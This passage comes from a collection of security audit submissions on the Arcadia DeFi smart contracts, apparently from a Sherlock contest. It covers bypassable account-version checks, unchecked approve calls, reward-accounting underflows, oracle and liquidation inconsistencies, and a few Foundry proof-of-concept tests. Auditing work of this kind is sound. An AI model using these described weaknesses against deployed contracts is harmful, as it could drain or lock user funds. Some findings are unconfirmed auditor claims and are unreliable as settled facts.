        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();

The accountVersion should not exceed latestAccountVersion and should not be blocked.

However, when the function Factory::setNewAccountInfo is not called, latestAccountVersion would remain to be 0. If accountVersion == 0, since accountVersion == latestAccountVersion and accountVersionBlocked[0] == false, the requirement can be bypassed.

Since versionInformation[accountVersion].implementation will be address(0) if no value is set before, the Proxy created will take address(0) as the address in IMPLEMENTATION_SLOT to delegate to. So this proxy is of non-sense and can't be used.

    constructor(address implementation) payable {
        _getAddressSlot(IMPLEMENTATION_SLOT).value = implementation;
        emit Upgraded(implementation);
    }

Since AccountV1::initialize has no return value, the code will not revert. NFT will be minted and accounts will be recognized as valid.

        allAccounts.push(account);
        accountIndex[account] = allAccounts.length; // What about accountIndex = 0?

        _mint(msg.sender, allAccounts.length);

        IAccount(account).initialize(msg.sender, versionInformation[accountVersion].registry, creditor);

We have a PoC here:

comment factory.setNewAccountInfo(address(registryExtension), address(accountV1Logic), Constants.upgradeProof1To2, ""); in the setUp() function.

    function test_createAccountWithoutAccount() public {
        console2.log("current latestAccountVersion", factory.latestAccountVersion());
        assertEq(factory.latestAccountVersion(),0);
        address proxyAddress = factory.createAccount(0, 0, address(0));
        console2.log("proxyAddress ", proxyAddress);
        AccountV1 proxyAccount = AccountV1(proxyAddress);
        assertEq(factory.allAccountsLength(),1);  // nft will still be minted
        proxyAccount.setNumeraire(address(this)); // Delegate Call on EOA won't revert
        factory.createAccount(1, 0, address(0));
        assertEq(factory.allAccountsLength(),2);
    }

The result is shown below:
image

Impact

The current check is flawed and could be bypassed when no versionInformation has been set. Thus Proxy delegating to address(0) will be created. Even if it is nonsense and should not be valid, the NFT will still be minted and still be counted as a valid account.

Code Snippet

Factory::createAccount

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        returns (address account)
    {
        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();

        // Hash tx.origin with the user-provided salt to avoid front-running Account deployment with an identical salt.
        // We use tx.origin instead of msg.sender so that deployments through a third party contract are not vulnerable to front-running.
        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );

        allAccounts.push(account);
        accountIndex[account] = allAccounts.length;

        _mint(msg.sender, allAccounts.length);

        IAccount(account).initialize(msg.sender, versionInformation[accountVersion].registry, creditor);

        // unsafe cast: accountVersion <= latestAccountVersion, which is a uint88.
        emit AccountUpgraded(account, uint88(accountVersion));
    }

Proxy::constructor

    constructor(address implementation) payable {
        _getAddressSlot(IMPLEMENTATION_SLOT).value = implementation;
        emit Upgraded(implementation);
    }

Tool used

Foundry

Manual Review

Recommendation

A few ways to mitigate the issue.

  1. Add a check to ensure that latestAccountVersion is not 0.
  2. Block version 0 by default.

AgileJune - StakedStargateAM.sol The approve() return value not checked

AgileJune

medium

StakedStargateAM.sol The approve() return value not checked

Summary

There is no checking of return value when calling approve() in _stake().

Vulnerability Detail

Not all IERC20 implementations revert when there's a failure in approve.
Some ERC-20 tokens, such as USDC (USD Coin), are known to exhibit behavior where the approve function does not revert on failure.
The function signature has a boolean return value and they indicate errors that way instead

Impact

By not checking the return value, operations that should have marked as failed, may potentially go through without actually approving anything.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L83

Tool used

Manual Review

Recommendation

Check return value and revert if false

n1punp - When the `gracePeriod` is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

n1punp

high

When the gracePeriod is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

Summary

When the gracePeriod is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

Vulnerability Detail

Per the documentation, the Registry's sequencer gracePeriod is the grace period after the sequencer is back up. If we look at the code, the Registry treats the sequencer as "down" if the sequencer uptime oracle either:

  1. reports answer = 1 -- representing the "down" status, or
  2. the report is too stale, more than the defined grace period ( block.timestamp - startedAt < riskParams[creditor].gracePeriod )

However, if we look on-chain, we see that this oracle uptime feed does not have a guaranteed "heartbeat" duration. This means the status will only get updated when the sequencer's status changes (from down to up, or up to down). For a specific example, we can look at the most 3 recent rounds of Arbitrum's sequencer uptime feed oracle ( https://arbiscan.io/address/0xFdB631F5EE196F0ed6FAa767959853A9F217697D#readContract ). At the time of writing, here is the data:

  • Round 18446744073709551649: answer=0 , startedAt=1668705995 (Nov 17, 2022 -- ~1 year ago+)
  • Round 18446744073709551650: answer=1 , startedAt=1703701247 (Dec 27, 2023 -- ~a month ago+)
  • Round 18446744073709551651: answer=0 , startedAt=1703701283 (Dec 27 2023 -- ~a month ago+)

As we can see, the duration between each update can range from months to more than a year. So, if the grace period is not sufficiently large, then the Registry will simply treat the sequencer as down, while it should be considered up. So, it will function incorrectly.

Impact

The Registry will treat the sequencer as down most of the time, if the gracePeriod is defined < 1 year+, as shown by the on-chain evidence. Even if it is defined large enough, it may still not be large enough if time passed and the sequencer functions properly all the time.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Registry.sol#L174-L176

Tool used

Manual Review

Recommendation

  • Define the grace period large enough (perhaps max possible), or simply remove staleness check (grace period) for sequencer uptime oracle altogether.

rvierdiiev - No ability to withdraw from stargate LPStaking in case of emergency

rvierdiiev

medium

No ability to withdraw from stargate LPStaking in case of emergency

Summary

No ability to withdraw from stargate LPStaking in case of emergency as emergencyWithdraw is not integrated.

Vulnerability Detail

Users can wrap their stargate lp tokens to the AbstractStakingAM contract to use it as collateral in the accounts.

Stargate LPStaking contract has emergencyWithdraw function that allows to withdraw lp tokens from contract in case of emergency. In this case there will be no claiming of rewards, just transferring of lp tokens.

But AbstractStakingAM doesn't have integration with that function which takes user's lp token under a risk.

Impact

No ability to withdraw in case of emergency is stargate

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

Implement emergencyWithdraw integration.

Duplicate of #172

jesjupyer - error is not properly handled for a user who create `Proxy` using `Factory` with the same salt twice.

jesjupyer

medium

error is not properly handled for a user who create Proxy using Factory with the same salt twice.

Summary

The used salt from a certain user to call createAccount in order to create Proxy is not stored nor flagged, and there is no proper error handling for this. Thus if the user tries to createAccount with the same salt multiple times, an unexpected revert will happen and the user will have no idea of what happened.

Vulnerability Detail

In the function Factory::createAccount, the salt is used to create Proxy.

        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );

However, the salt is not stored nor flagged for the current user. So it's possible that the user may call Factory::createAccount twice.

The contract doesn't properly handle this issue. So when the same user uses a salt twice, an expected revert would occur without a specific reason being given.

The POC is below:

    function test_doubleDeploy() public {
        address proxyAddress = factory.createAccount(0, 0, address(0));
        console2.log("proxyAddress ", proxyAddress);
        vm.expectRevert();
        address proxyAddress2 = factory.createAccount(0, 0, address(0));
    }

and the output is simply reverted with no specific reason being given.
image

Impact

When the user uses the salt twice, the transaction would unexpectedly revert with no specific reason being given as this kind of scenario is never properly handled.

Code Snippet

Factory::createAccount

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        returns (address account)
    {
        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();
        

        // Hash tx.origin with the user-provided salt to avoid front-running Account deployment with an identical salt.
        // We use tx.origin instead of msg.sender so that deployments through a third party contract are not vulnerable to front-running.
        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );
        ...
    }

Tool used

Manual Review, Foundry

Recommendation

  1. Use a mapping to store if tx.origin + salt has been used.

  2. use try-catch to handle this case, and revert when necessary.

        try  new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                   versionInformation[accountVersion].implementation
                )
        returns (Proxy account) {
            return address(account);
        }
        catch (bytes memory reason){
            revert("Used Salt");
        }

0xrice.cooker - Wrong logic in StakedStargateAM._getCurrentReward() lead to DOS in AbstractStakingAM._getRewardBalances()

0xrice.cooker

medium

Wrong logic in StakedStargateAM._getCurrentReward() lead to DOS in AbstractStakingAM._getRewardBalances()

Summary

Wrong logic in StakedStargateAM._getCurrentReward() lead to DOS in AbstractStakingAM._getRewardBalances()

Vulnerability Detail

DISCLAIMER: this issue is not a duplicate of the HIGH bug about the reward in LP_STAKING_TIME.deposit() and LP_STAKING_TIME.withdraw() send the reward directly to StakedStargateAM contract

Root cause: _getCurrentReward() get the reward that CAN be claimed when it should get the total reward both already claimed and can be claimed

As the sponsor comment about _getCurrentReward() here:

Returns the amount of reward tokens that can be claimed BY THIS CONTRACT for a specific asset.

This mean, when we claim the reward, _getCurrentReward() will be reset to 0. But it should not reset to 0. In fact, it should be accumulate the yield reward over time and NEVER decrease it. If we don't do that, AbstractStakingAM._getRewardBalances() will be DOS in this line:

    function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {
        if (assetState_.totalStaked > 0) {

            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);

            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;// <<<@DOS here
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);

            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }


            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

The reason that it get DOS because assetState_.lastRewardGlobal is the reward claimed in that time. Due to _getCurrentReward() reset to 0 everytime it got claimed, we need to wait longer than the last time to make _getCurrentReward(positionState_.asset) > assetState_.lastRewardGlobal.

Impact

Affected DOS function (functions that call to AbstractStakingAM._getRewardBalances()):
+ AbstractStakingAM.mint()
+ AbstractStakingAM.increaseLiquidity()
+ AbstractStakingAM.decreaseLiquidity()
+ AbstractStakingAM.claimReward()
+ AbstractStakingAM.getRiskFactors()

Code Snippet

Tool used

Manual Review

Recommendation

The fix:

+   mapping(uint256 => uint256) pidToReward;

    function _stake(address asset, uint256 amount) internal override {
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    
-       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + pidToReward[assetToPid[asset]];
    }

Combine with the fix in the HIGH low-hanging bug:

+   mapping(uint256 => uint256) pidToReward;

    function _stake(address asset, uint256 amount) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    
-        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + pidToReward[assetToPid[asset]];
    }

Duplicate of #38

rvierdiiev - assetState_.lastRewardGlobal is not cleared during deposit

rvierdiiev

high

assetState_.lastRewardGlobal is not cleared during deposit

Summary

When new deposit is done to the stargate, then all earned rewards are sent to the caller. Because assetState_.lastRewardGlobal is not reset to 0 as it's done for other functions that work with balance, then rewards distribution becomes incorrect and broken.

Vulnerability Detail

User can claim rewards using burn, decreaseLiquidity and claimReward functions. All of them then set assetState_.lastRewardGlobal to 0. This variable tracks the increase of earned rewards fro the contract between rewards claiming. Once rewards are claimed, then it should be cleared.

AbstractStakingAM contract incorrectly assumes, that only withdrawing from LP_STAKING_TIME claims rewards. This is not true and when deposit occurs, then rewards are claimed as well.

When user deposits to AbstractStakingAM then rewards are claimed, but assetState_.lastRewardGlobal is not set to 0. As result, rewards distribution will be incorrect. Also for some time _getRewardBalances function will revert because of underflow as _getCurrentReward will likely return smaller value than assetState_.lastRewardGlobal. After some time function will continue working again.

Impact

Rewards accounting is corrupted, contract can be dosed for some time.

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

As deposit also claims rewards, then you need to clear assetState_.lastRewardGlobal variable.

Duplicate of #38

jesjupyer - Lack of `checkOracleSequence` call in function `Registry::getRateInUsd`

jesjupyer

medium

Lack of checkOracleSequence call in function Registry::getRateInUsd

Summary

The checkOracleSequence ensures that the oracle sequence should comply with sets of criteria(For example, properly added oracle, consecutive order, last Asset being USD). However, in Registry::getRateInUsd, oracleSequence is being directly unpacked and used without calling checkOracleSequence. Thus, the input oracle may not be registered, the sequence may not be valid, and even the last asset may not be USD, all leading to an incorrect return value of rate.

Vulnerability Detail

The function Registry::getRateInUsd is external and can be called by anyone including users.

    function getRateInUsd(bytes32 oracleSequence) external view returns (uint256 rate) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();

        rate = 1e18;

        uint256 length = oracles.length;
        for (uint256 i; i < length; ++i) {
            // Each Oracle has a fixed base asset and quote asset.
            // The oracle-rate expresses how much tokens of the quote asset (18 decimals precision) are required
            // to buy 1 token of the BaseAsset.
            if (baseToQuoteAsset[i]) {
                // "Normal direction" (how much of the QuoteAsset is required to buy 1 token of the BaseAsset).
                // -> Multiply with the oracle-rate.
                rate = rate.mulDivDown(IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]), 1e18);
            } else {
                // "Inverse direction" (how much of the BaseAsset is required to buy 1 token of the QuoteAsset).
                // -> Divide by the oracle-rate.
                rate = rate.mulDivDown(1e18, IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]));
            }
        }
    }

However, the function doesn't call checkOracleSequence to perform the check to ensure the following criteria:

  • The oracle must be previously added to the Registry and must still be active.
  • The last Asset of oracles (except for the last oracle) must be equal to the first asset of the next oracle.
  • The last Asset of the last oracle must be USD.

The function just unpacks the oracleSequence and does the multiply without checking and reverting. If any of the above criteria is not met, the returned value will be incorrect. Thus, the input oracle may not be registered, the sequence may not be valid, and even the last asset may not be USD, all leading to an incorrect return value of rate.

Impact

Registry::getRateInUsd can be called by anyone but it lacks a check of the input oracleSequence. Thus, the input oracle may not be registered, the sequence may not be valid, and even the last asset may not be USD, all leading to an incorrect return value of rate.

Code Snippet

Registry::getRateInUsd

    function getRateInUsd(bytes32 oracleSequence) external view returns (uint256 rate) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();

        rate = 1e18;

        uint256 length = oracles.length;
        for (uint256 i; i < length; ++i) {
            // Each Oracle has a fixed base asset and quote asset.
            // The oracle-rate expresses how much tokens of the quote asset (18 decimals precision) are required
            // to buy 1 token of the BaseAsset.
            if (baseToQuoteAsset[i]) {
                // "Normal direction" (how much of the QuoteAsset is required to buy 1 token of the BaseAsset).
                // -> Multiply with the oracle-rate.
                rate = rate.mulDivDown(IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]), 1e18);
            } else {
                // "Inverse direction" (how much of the BaseAsset is required to buy 1 token of the QuoteAsset).
                // -> Divide by the oracle-rate.
                rate = rate.mulDivDown(1e18, IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]));
            }
        }
    }

Registry::checkOracleSequence

     * - The oracle must be previously added to the Registry and must still be active.
     * - The last Asset of oracles (except for the last oracle) must be equal to the first asset of the next oracle.
     * - The last Asset of the last oracle must be USD.

Tool used

Manual Review, VSCode

Recommendation

Add require(checkOracleSequence(oracleSequence),"bad oracle sequence"); in the function to ensure the input is checked by default.

AgileJune - AbstractStakingAM.sol: increaseLiquidity(), mint() will revert expect for first calling, and be failed

AgileJune

high

AbstractStakingAM.sol: increaseLiquidity(), mint() will revert expect for first calling, and be failed

Summary

AbstractStakingAM.sol: increaseLiquidity(), mint() will revert expect for first calling, and be failed, when staking non-standard erc20 token like usdt.

Vulnerability Detail

AbstractStakingAM.sol: increaseLiquidity(), mint() invoke _stake() where calls `approve()'.
First approve() set the amount of allowance.
From second calling of _stake(), some token contracts(such as usdt..) revert the transaction because the previous allowance is not zero.

Impact

User can't stake more amounts of asset, but just only with first staking

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L83
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L285
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L314
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L327
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L351

Tool used

Manual Review

Recommendation

Recommend to set the allowance to 0 before calling it.

ERC20(asset).approve(address(LP_STAKING_TIME), 0);
ERC20(asset).approve(address(LP_STAKING_TIME), amount);

KiroBrejka - [H-1] - User can crate multiple accounts and use the minted NFTs as collateral

KiroBrejka

high

[H-1] - User can crate multiple accounts and use the minted NFTs as collateral

Summary

A malicious user can create multiple accounts and then deposit all of the minted NFTs into one main margin account and use them as collateral.

Vulnerability Detail

It will essentially be free for the user to create multiple margin accounts by using the Factory::createAccount() function. After creating those accounts, they can deposit the minted NFTs into one main margin account and use them as practically free collateral to obtain margin from the creditor.

Impact

The malicious user can get margin for free, so he doesn't care about being liquidated because they lose nothing. The other created accounts are practically useless, so he doesn't care what happens with them either.

Code Snippet

Creation of an Arcadia Account:
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol?plain=1#L84-L101

Deposit into Arcadia Account:
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol?plain=1#L818-L826
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol?plain=1#L835-L866

Tool used

Manual Review

Recommendation

Check if a user already has an account, and if they do, revert the Factory::createAccount() function or make the function payable so that minting multiple accounts does not appear worthwhile.

0xVolodya - Sometimes account wll be liquidatable but liquidator will not be able to start liquidation of an account

0xVolodya

medium

Sometimes account wll be liquidatable but liquidator will not be able to start liquidation of an account

Summary

Lets look at how isAccountLiquidatablein an account contract works, first _calculateLiquidationValue and after _convertValueInUsdToValueInNumeraire with that number.

    function getLiquidationValue(
        address numeraire,
        address creditor,
        address[] calldata assetAddresses,
        uint256[] calldata assetIds,
        uint256[] calldata assetAmounts
    ) external view sequencerNotDown(creditor) returns (uint256 liquidationValue) {
        AssetValueAndRiskFactors[] memory valuesAndRiskFactors =
            getValuesInUsd(creditor, assetAddresses, assetIds, assetAmounts);

        // Calculate the "liquidationValue" in USD with 18 decimals precision.
        liquidationValue = valuesAndRiskFactors._calculateLiquidationValue();

        // Convert the USD-value to the value in Numeraire if the Numeraire is different from USD (0-address).
        if (numeraire != address(0)) {
            liquidationValue = _convertValueInUsdToValueInNumeraire(numeraire, liquidationValue);
        }
    }

Registry.sol#L784
In startLiquidation - _convertValueInUsdToValueInNumeraire and after _calculateLiquidationValue

    function startLiquidation(address initiator)
        external
        onlyLiquidator
        nonReentrant
        updateActionTimestamp
        returns (
            address[] memory assetAddresses,
            uint256[] memory assetIds,
            uint256[] memory assetAmounts,
            address creditor_,
            uint96 minimumMargin_,
            uint256 openPosition,
            AssetValueAndRiskFactors[] memory assetAndRiskValues
        )
    {
        assetAndRiskValues =
            IRegistry(registry).getValuesInNumeraire(numeraire, creditor_, assetAddresses, assetIds, assetAmounts);
....
        if (openPosition == 0 || assetAndRiskValues._calculateLiquidationValue() >= usedMargin) {
            revert AccountErrors.AccountNotLiquidatable();
        }
    }

Vulnerability Detail

Due to rounding sometimes isAccountLiquidatable = usedMargin - 1, but startLiquidation = usedMargin

Impact

Code Snippet

Tool used

POC

    function testFuzz_startLiquidation_same_isAccountLiquidatable(
        uint32 gracePeriod,
        uint32 assetAmounts0,
        uint32 assetAmounts1,
        uint32 assetAmounts2,
        uint32 startedAt,
        uint32 currentTime
    ) public {
        // Given: startedAt does not underflow.
        // And: oracle staleness-check does not underflow.
        currentTime = uint32(bound(currentTime, 2 days, type(uint32).max));
        vm.warp(currentTime);

        // And: Oracles are not stale.
        vm.startPrank(users.defaultTransmitter);
        mockOracles.stable1ToUsd.transmit(int256(rates.stable1ToUsd));
        mockOracles.token1ToUsd.transmit(int256(rates.token1ToUsd));
        mockOracles.nft1ToToken1.transmit(int256(rates.nft1ToToken1));
        vm.stopPrank();

        // And: Sequencer is online.
        startedAt = uint32(bound(startedAt, 0, currentTime));
        sequencerUptimeOracle.setLatestRoundData(0, startedAt);

        // And: Grace period did pass.
        gracePeriod = uint32(bound(gracePeriod, 0, currentTime - startedAt));
        vm.prank(creditorUsd.riskManager());
        registryExtension.setRiskParameters(address(creditorUsd), 0, gracePeriod, type(uint64).max);

        address[] memory assetAddresses = new address[](3);
        assetAddresses[0] = address(mockERC20.stable1);
        assetAddresses[1] = address(mockERC20.token1);
        assetAddresses[2] = address(mockERC721.nft1);

        uint256[] memory assetIds = new uint256[](3);
        assetIds[0] = 0;
        assetIds[1] = 0;
        assetIds[2] = 1;

        uint256[] memory assetAmounts = new uint256[](3);
        assetAmounts[0] = assetAmounts0;
        assetAmounts[1] = assetAmounts1;
        assetAmounts[2] = assetAmounts2;


        AssetValueAndRiskFactors[] memory actualValuesPerAsset = registryExtension.getValuesInNumeraire(
            address(mockERC20.token1), address(creditorUsd), assetAddresses, assetIds, assetAmounts
        );
        uint compareNumber = actualValuesPerAsset._calculateLiquidationValue();

        uint compareNumber2 = registryExtension.getLiquidationValue(
            address(mockERC20.token1), address(creditorUsd), assetAddresses, assetIds, assetAmounts
        );

        assertEq(compareNumber, compareNumber2);
    }

Manual Review

Recommendation

Sync them

0xVolodya - Account in some cases will become liquidatable after an upgrade

0xVolodya

high

Account in some cases will become liquidatable after an upgrade

Summary

Two different registries can have different risk parameters minUsdValue. That means that some assets that were higher than minUsdValue1 but lower than minUsdValue2 will affect the total collateral value of the account. So, an account's getCollateralValue will decrease, thus an account can become liquidatable after an upgrade.

Vulnerability Detail

    function getValuesInUsd(
        address creditor,
        address[] calldata assets,
        uint256[] calldata assetIds,
        uint256[] calldata assetAmounts
    ) public view sequencerNotDown(creditor) returns (AssetValueAndRiskFactors[] memory valuesAndRiskFactors) {
        uint256 length = assets.length;
        valuesAndRiskFactors = new AssetValueAndRiskFactors[](length);

        uint256 minUsdValue = riskParams[creditor].minUsdValue;
        for (uint256 i; i < length; ++i) {
            (
                valuesAndRiskFactors[i].assetValue,
                valuesAndRiskFactors[i].collateralFactor,
                valuesAndRiskFactors[i].liquidationFactor
            ) = IAssetModule(assetToAssetModule[assets[i]]).getValue(creditor, assets[i], assetIds[i], assetAmounts[i]);
            // If asset value is too low, set to zero.
            // This is done to prevent dust attacks which may make liquidations unprofitable.
            if (valuesAndRiskFactors[i].assetValue < minUsdValue) valuesAndRiskFactors[i].assetValue = 0;
        }
    }

src/Registry.sol#L663

Impact

Code Snippet

Tool used

Manual Review

Recommendation

Add healthy check

    function upgradeAccount(address newImplementation, address newRegistry, uint256 newVersion, bytes calldata data)
        external
        onlyFactory
        nonReentrant
        notDuringAuction
        updateActionTimestamp
    {
        // Cache old parameters.
        address oldImplementation = _getAddressSlot(IMPLEMENTATION_SLOT).value;
        address oldRegistry = registry;
        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion);
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

        // Event emitted by Factory.
+        if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();
    }

jesjupyer - `assetToInformation` is never initialized in `PrimaryAM`, causing `setOracles` always fail due to `Min1Oracle`

jesjupyer

high

assetToInformation is never initialized in PrimaryAM, causing setOracles always fail due to Min1Oracle

Summary

In the PrimaryAM contract, the variable assetToInformation is defined to store the assetInformation. But currently in the contract, the assetToInformation is not initialized in the contract. Thus, when setOracles is called, empty bytes will be regarded as oldOracles, and is used in IRegistry(REGISTRY).checkOracleSequence(oldOracles). Since empty bytes will surely revert due to Min1Oracle, setOrcales will always fail.

Vulnerability Detail

In the PrimaryAM contract, the variable assetToInformation is defined to store the assetInformation.

    mapping(bytes32 assetKey => AssetInformation) public assetToInformation;

But there is only in setOracles that the assetToInformation is ever set.

    function setOracles(address asset, uint256 assetId, bytes32 newOracles) external onlyOwner {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);

        // At least one of the old oracles must be inactive before a new sequence can be set.
        bytes32 oldOracles = assetToInformation[assetKey].oracleSequence;
        if (IRegistry(REGISTRY).checkOracleSequence(oldOracles)) revert OracleStillActive();

        // The new oracle sequence must be correct.
        if (!IRegistry(REGISTRY).checkOracleSequence(newOracles)) revert BadOracleSequence();

        assetToInformation[assetKey].oracleSequence = newOracles;
    }

So, in the statement IRegistry(REGISTRY).checkOracleSequence(oldOracles), the oldOracles will be assetToInformation[assetKey].oracleSequence which are empty.

In the Registry::checkOracleSequence, empty bytes will revert due to Min1Oracle.

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        ...
    }

Unless a function is defined to purposely set the setAssetInformation, the function call setOrcales will always fail. But there is no doc/comment specifying this.

It should be noted that in the mock file PrimaryAMMock, a function setAssetInformation is added, and should be called before setOracles.

    function setAssetInformation(address asset, uint256 assetId, uint64 assetUnit, bytes32 oracles) public {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);
        assetToInformation[assetKey].assetUnit = assetUnit;
        assetToInformation[assetKey].oracleSequence = oracles;
    }

For the same reason, the function PrimaryAM::getValue will. also fail.

But in real cases, a setAssetInformation should be defined for PrimaryAM, since the contract is expected to work properly when its all interfaces are implemented. Adding patches in the test file does not mean the contract itself is free of bugs. Anyone who implements PrimaryAM without realizing this issue will certainly suffer from DOS.

Here is the PoC. Add it in SetOracles.fuzz.t.sol

    function testFuzz_fail_setOracles(
        address asset,
        uint96 assetId,
        uint256 lengthOld,
        bool[3] memory directionsOld,
        uint80[3] memory oraclesOld,
        uint256 lengthNew,
        bool[3] memory directionsNew,
        uint80[3] memory oraclesNew
    ) public {
        // Add the old oracles and set the oracle sequence for the asset.
        lengthOld = bound(lengthOld, 1, 3);
        addOracles(lengthOld, directionsOld, oraclesOld);
        
        // And one of the old oracles is not active anymore.
        lengthNew = bound(lengthNew, 1, 3);
        for (uint256 i; i < lengthNew; ++i) {
            vm.assume(oraclesOld[0] != oraclesNew[i]);
        }
        oracleModule.setIsActive(oraclesOld[0], false);

        // Add the new oracles.
        addOracles(lengthNew, directionsNew, oraclesNew);
        bytes32 oracleSequenceNew = getOracleSequence(lengthNew, directionsNew, oraclesNew);

        vm.prank(users.creatorAddress);
        vm.expectRevert();
        assetModule.setOracles(asset, assetId, oracleSequenceNew);

    } 

It can be seen that empty bytes are used, and the transaction is reverted.
image

Impact

Empty bytes will be regarded as oldOracles and cause a revert due to Min1Oracle, thus setOrcales will always fail. Causing DOS and function failure for the contract.

Code Snippet

PrimaryAM::assetToInformation

    mapping(bytes32 assetKey => AssetInformation) public assetToInformation;

PrimaryAM::setOracles

    function setOracles(address asset, uint256 assetId, bytes32 newOracles) external onlyOwner {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);

        // At least one of the old oracles must be inactive before a new sequence can be set.
        bytes32 oldOracles = assetToInformation[assetKey].oracleSequence;
        if (IRegistry(REGISTRY).checkOracleSequence(oldOracles)) revert OracleStillActive();

        // The new oracle sequence must be correct.
